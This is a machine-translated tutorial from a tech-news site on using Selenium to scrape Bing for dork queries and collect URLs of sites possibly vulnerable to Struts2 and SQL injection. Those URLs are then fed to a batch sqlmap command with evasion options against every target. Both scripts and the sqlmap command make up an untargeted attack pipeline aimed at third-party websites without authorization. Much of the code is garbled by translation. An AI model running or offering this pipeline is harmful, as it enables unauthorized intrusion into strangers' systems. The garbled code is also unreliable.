How to use selenium to crawl known vulnerabilities on the Internet 07/09 Update SLTechnology News&Howtos

How to use selenium to crawl known vulnerabilities on the Internet

2025-07-09 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

Editor to share with you how to use selenium to crawl known loopholes on the Internet. I hope you will gain something after reading this article. Let's discuss it together.

Basic knowledge of selenium

Introduction

Python is a crawler. If you crawl a static web page, the requests library is used as the request, and the bs4 and lxml libraries are used to analyze the crawled web page content.

Now the major search engines are dynamically loaded, about crawling dynamic web pages, I have learned some methods:

1. Direct url: find the api interface of js

2.webkit manually simulates js

3.scrapyjs scrapyjs acts like an adhesive and can integrate splash into scrapy.

4. Splash + docker

The combination of 5.phatomjs and selenium uses a simulation browser, which consumes a lot and is not suitable for large reptiles.

Here we use method 5, but phatomjs is no longer cp with the selenium group (you can continue to use it), and Firefox and google have also introduced headless browsers, so we use the google browser driver to achieve the goal (pay attention to the version when debugging, different versions of css and xpath selection expressions may be different)

I'm not using a headless approach, but note that it's easy to debug and we're just doing security research; if the reader wants to use it, just keep modifying it like this:

Chrome_options= Options ()

Chrome_options.add_argument ("--headless")

Driver=webdriver.Chrome (executable_path= (rusted D:\ selenium\ chrome/chromedriver.exe'), chrome_options=chrome_options)

Install selenium

Download the drive:

Https://www.cnblogs.com/freeweb/p/4568463.html

Https://www.cnblogs.com/qiezizi/p/8632058.html

Python can install the selenium library (pipinstall selenium)

You can search for some simple grammar knowledge by yourself.

FAQ of selenium

I still want to mention this point. The syntax is very simple, and the key debugging is very troublesome.

1. Unable to locate element

The problem is that the elements are taken before the web page is loaded. Originally, the first time is to set sleep (), but it will cause socket to be disconnected, so use the built-in

Importselenium.webdriver.support.ui as ui

Wait= ui.WebDriverWait (driver,20)

Printwait.until (lambda x: x.find_element_by_css_selector ("# b_results > li.b_pag > nav > ul > li:nth-child (3) > a") .text

2. Ascii coding of python

Importsys

Reload (sys)

Sys.setdefaultencoding ('utf-8')

3. Element is not in the view

What hurts the most, I've been looking for a way for a long time.

Elementnot visible appears

Simulate mouse clicks with ActionChains

Reference:

Http://www.mamicode.com/info-detail-1981462.html

4. Set the crawling target

How to write it? Let's search the international version of bing and crawl for possible vulnerabilities in struts2.

5. Write code

If you are interested in the writing process, you can study it if you are interested. The author mentions a few points here. Other grammars should be simply searched, and then turn down page by page to collect the URL of each page. The syntax selected by xpath and css here is related to your browser-driven version. Enter the browser and change the selection code (don't say it won't work, it's available for testing).

Code:

# coding=utf-8

Importsys

Reload (sys)

Sys.setdefaultencoding ('utf-8')

Importtime

Fromselenium import webdriver

Importselenium.webdriver.support.ui as ui

Fromselenium.webdriver.common.keys import Keys

Fromselenium.common.exceptions import TimeoutException

# introduce ActionChains mouse operation class

Fromselenium.webdriver.common.action_chains import ActionChains

Start_url= "https://cn.bing.com/search?q=inurl%3a.action%3f&qs=n&sp=-1&pq=inurl%3a.action%3f&sc=1-14&sk=&cvid=DBCB283FC96249E8A522340DF4740769&first=67&FORM=PERE4"

Urls=range (200)

Massif 0

S = [1, 2, 3, 4, 5, 6, 7, 8, 9]

Driver=webdriver.Chrome (executable_path= "D:/selenium/chrome/chromedriver.exe")

Wait=ui.WebDriverWait (driver,20)

Driver.get (start_url)

Forn in range (7cr 57):

Ifn%2 = = 1PUR # domestic version

ITunes 7

Else:

ITunes 8

ITunes 7

Forj in s [0:]:

Try:

# / / * [@ id= "b_results"] / li [1] / h3gama international version

# printwait.until (lambdax:x.find_element_by_xpath ('/ / * [@ id= "b_results"] / li ['+ str (j) +'] / h3gama a') .get_attribute ("href"))

# urls [m] = wait.until (lambdax:x.find_element_by_xpath ('/ * [@ id= "b_results"] / li ['+ str (j) +'] / h3gama') .get_attribute ("href"))

# domestic version

Printwait.until (lambdax:x.find_element_by_xpath ('/ html/body/div [1] / ol [1] / li ['+ str (j) +'] / h3gama') .get_attribute ("href"))

Urls [m] = wait.until (lambdax:x.find_element_by_xpath ('/ html/body/div [1] / ol [1] / li ['+ str (j) +'] / h3gama') .get_attribute ("href"))

M=m+1

ExceptException as e:

Continue

Try:

Printi

ActionChains (driver) .click (wait.until (lambdax: x.find_element_by_css_selector ("# b_results > li.b_pag > nav > ul > li:nth-child (" + str (I) + ") > a")) .perform ()

ExceptException as e:

Continue

Withopen ("urlss.txt", "a +") as f:

Forurl in urls [0:]:

F.write (str (url))

F.write ('\ n')

F.close ()

Driver.quit ()

Realize the effect

The batch tools of a company used here

Tool links:

Https://www.jb51.net/softs/574358.html

Provide a link to an open source stu tool: github's open source project, keep up with the pace, just updated 057 a few days ago

Author project address:

Https://github.com/Lucifer1993/struts-scan

The results of the test are as follows:

Supplement

Although the sql hole is difficult to find, two years ago, it is a piece of area, but now it is not good, but the author still wrote a crawl code

Goal: search for sensitive words: inurl:php?id

Code:

# coding=utf-8

Importsys

Reload (sys)

Sys.setdefaultencoding ('utf-8')

Importtime

Fromselenium import webdriver

Importselenium.webdriver.support.ui as ui

Fromselenium.webdriver.common.keys import Keys

Fromselenium.common.exceptions import TimeoutException

# introduce ActionChains mouse operation class

Fromselenium.webdriver.common.action_chains import ActionChains

Start_url= "https://cn.bing.com/search?q=inurl%3aphp%3fid%3d&qs=HS&sc=8-0&cvid=2EEF822D8FE54B6CAAA1CE0169CA5BC5&sp=1&first=53&FORM=PERE3"

Urls=range (800)

Massif 0

S = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]

Driver=webdriver.Chrome (executable_path= "D:/selenium/chrome/chromedriver.exe")

Wait=ui.WebDriverWait (driver,20)

Driver.get (start_url)

Fori in range (1JI 50):

Forj in s [0:]:

Try:

Urls [m] = wait.until (lambdax:x.find_element_by_xpath ('/ * [@ id= "b_results"] / li ['+ str (j) +'] / h3gama') .get_attribute ("href"))

Printurls [m]

M=m+1

ExceptException as e:

E.message

Printi

Try:

ActionChains (driver) .click (wait.until (lambdax: x.find_element_by_css_selector ("# b_results > li.b_pag > nav > ul > li:nth-child (7) > a")) .perform ()

ExceptException as e:

Continue

Printm

Withopen ("urls.txt", "a +") as f:

Forurl in urls [0:]:

F.write (str (url))

F.write ('\ n')

F.close ()

Driver.quit ()

Test effect

Because the cycle is too long, there is no specific test, but url is crawled down, I give instructions to sqlmap

(considering shell multi-thread running sqlmap, providing ideas for reference, for the purpose of learning, there are few vulnerabilities; shell multi-thread reference: https://blog.csdn.net/bluecloudmatrix/article/details/48421577)

Sqlmap-murls.txt-- batch--delay=1.3--level=3--tamper=space2comment--dbms=mysql--technique=EUS--random-agent--is-dba--time-sec=10 | tee result.txt

Analysis command

1. Sqlmap-m specified file

2.-- delay specifies the interval time for each request requests. Default is 0.5.

3.-- level detection request header, such as source, agent, etc. Default is 1

4.-- dbms=mysql specifies that the database is mysql

5.-- technique=EUS, (without blind injection test, the cycle is already long)

B:Boolean-based blind SQL injection (Boolean injection)

E:Error-based SQL injection (error injection)

U:UNION query SQL injection (can be injected into federated queries)

S:Stacked queries SQL injection (query injection with multiple statements)

T:Time-based blind SQL injection (based on time delay injection)

6. Tee pipe commands are displayed on the screen and output to a file for our analysis.

After reading this article, I believe you have a certain understanding of "how to use selenium to crawl known loopholes on the Internet". If you want to know more about it, you are welcome to follow the industry information channel. Thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.